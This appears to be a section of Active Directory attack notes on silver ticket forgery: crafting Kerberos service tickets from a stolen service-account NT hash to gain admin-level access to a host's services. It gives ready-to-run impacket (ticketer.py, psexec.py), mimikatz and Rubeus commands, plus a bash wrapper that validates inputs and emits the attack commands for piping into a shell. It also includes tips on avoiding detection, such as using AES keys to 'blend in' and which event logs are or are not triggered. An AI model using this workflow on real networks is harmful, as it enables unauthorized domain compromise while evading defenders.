6. Silver ticket
- craft a valid TGS (service ticket) for one service after obtaining the NTLM hash of the account that runs that service: usually the target host's computer account (HOST$), or a service account that owns the SPN
- the ticket is built and encrypted locally with that key, so the KDC is never contacted; the forged PAC can name any user (even one that does not exist) with any group membership (e.g. Domain Admins), which gives maximum privilege on that service only, not on the whole domain
- works against services that do not ask the DC to validate the PAC (services running as SYSTEM such as cifs/host skip it); since nothing reaches the KDC there is no 4768/4769 on the DC, only a 4624 (Kerberos, logon type 3) on the target, possibly for an account name that does not exist
Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus plus Sysinternals PsExec (Windows)
Linux
ticketer.py -nthash HASH -domain-sid SID -domain DOMAIN -spn cifs/TARGET.DOMAIN USERNAME
export KRB5CCNAME=USERNAME.ccache
klist
psexec.py DOMAIN/USERNAME@TARGET.DOMAIN -k -no-pass
- HASH is the NT hash only (no LM: part) of the account that owns the SPN, e.g. TARGET$ from secretsdump or DCSync
- SID is the domain SID (S-1-5-21-...) without a trailing RID, e.g. from lookupsid.py or Get-ADDomain; a user or computer SID here yields a ticket the target silently rejects
- -spn is service/FQDN: cifs/ for SMB and psexec, http/ and wsman/ for WinRM, mssqlsvc/ for SQL Server, ldap/ on a DC for DCSync; USERNAME can be any name; by default ticketer puts RID 500 and Domain Admins membership into the PAC (see -user-id and -groups)
- ticketer writes USERNAME.ccache into the current directory; psexec.py takes DOMAIN/USERNAME (forward slash), and with -k the target must be the same FQDN as in the SPN, an IP address will not match the ticket
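The Linux steps above wrapped in checks for the inputs that most often produce a useless ticket (user SID instead of domain SID, LM:NT instead of NT-only hash, an SPN without service/FQDN, an IP as target). This is an added example, not from the original notes or from impacket; the function names (is_domain_sid, nt_hash_only, is_spn, silver_ticket_cmds) are my own, and the domain, SID, hash and host used in the demo are constructed placeholders. The wrapper only prints the commands, so it runs anywhere; pipe its output into sh on the attack box.

```shell
#!/usr/bin/env bash
# Added example (not from the original notes or from impacket): validate the
# inputs of the Linux silver-ticket workflow, then emit the exact commands.
# All values in the demo at the bottom (corp.local, dc01, SID, hash) are
# constructed and not real.
set -eu

# Domain SID is S-1-5-21-a-b-c, i.e. 7 dash-separated fields. A user or
# computer SID carries an extra RID (8 fields) and must not go to -domain-sid.
is_domain_sid() {
    case "$1" in S-1-5-21-*) ;; *) return 1 ;; esac
    local IFS=-
    set -- $1
    [ "$#" -eq 7 ]
}

# Accept "LM:NT" as printed by secretsdump, or a bare NT hash; emit the
# lowercase 32-hex NT hash that ticketer.py -nthash expects, or fail.
nt_hash_only() {
    local h="${1##*:}"
    [ "${#h}" -eq 32 ] || return 1
    case "$h" in *[!0-9a-fA-F]*) return 1 ;; esac
    printf '%s' "$h" | tr 'A-F' 'a-f'
}

# SPN must be service/FQDN. Its host part doubles as the psexec.py target,
# which with -k must be a name matching the ticket, never an IP.
is_spn() {
    case "$1" in */*.*) ;; *) return 1 ;; esac
    local host="${1#*/}"
    case "$host" in *[!0-9.]*) return 0 ;; *) return 1 ;; esac
}

# Print the command sequence for a validated set of inputs. Nothing is run.
#   silver_ticket_cmds DOMAIN DOMAIN_SID NT_HASH SERVICE/FQDN USERNAME
silver_ticket_cmds() {
    local domain="$1" sid="$2" hash="$3" spn="$4" user="$5" nt host
    is_domain_sid "$sid" || { echo "bad domain SID: $sid" >&2; return 1; }
    nt=$(nt_hash_only "$hash") || { echo "bad NT hash: $hash" >&2; return 1; }
    is_spn "$spn" || { echo "SPN must be service/fqdn: $spn" >&2; return 1; }
    host="${spn#*/}"
    printf 'ticketer.py -nthash %s -domain-sid %s -domain %s -spn %s %s\n' \
        "$nt" "$sid" "$domain" "$spn" "$user"
    printf 'export KRB5CCNAME=%s.ccache\n' "$user"
    printf 'klist\n'
    printf 'psexec.py %s/%s@%s -k -no-pass\n' "$domain" "$user" "$host"
}

# Demo with constructed values (fake domain SID, fake LM:NT hash):
#   bash silver.sh demo
if [ "${1:-}" = "demo" ]; then
    silver_ticket_cmds corp.local S-1-5-21-1111111111-2222222222-3333333333 \
        aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c \
        cifs/dc01.corp.local administrator
fi
```

The klist line is there on purpose: if the ccache does not show a ticket for exactly the SPN you passed, fix the inputs before touching the target, because a rejected forged ticket still leaves a failed 4624 on the host.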
Windows
.\mimikatz.exe
kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME /service:cifs /target:TARGET.DOMAIN /ticket:TICKET.kirbi
kerberos::ptt TICKET.kirbi
(add /ptt instead of /ticket: to inject straight into the current logon session without writing a file; use /aes256:KEY instead of /rc4:HASH when you have the AES key, which blends in better than an RC4 ticket)
or use Rubeus to do the same
.\Rubeus.exe ptt /ticket:TICKET.kirbi
klist
.\PsExec.exe -accepteula \\TARGET.DOMAIN cmd
- /service: is the service class (cifs, host, http, ldap, mssqlsvc ...) and /target: the host FQDN; together they form the SPN; the target is whatever host's service key you hold, it does not have to be a DC
- the injected ticket belongs to the logon session you ran ptt in, so run PsExec and other clients from that same session, and address the target by the FQDN in the ticket, not by IP; klist should list a ticket for cifs/TARGET.DOMAIN before you try